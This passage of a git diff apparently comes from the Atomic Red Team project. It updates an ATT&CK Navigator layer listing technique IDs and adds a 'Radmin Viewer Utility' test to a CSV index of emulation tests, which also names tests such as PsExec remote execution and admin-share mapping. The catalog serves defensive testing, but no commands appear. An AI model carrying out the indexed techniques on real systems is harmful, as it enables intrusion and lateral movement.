test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index b071737c..333ded94 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -800,6 +800,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt +execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh @@ -827,6 +828,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt +lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell lateral-movement,T1021.006,Windows Remote 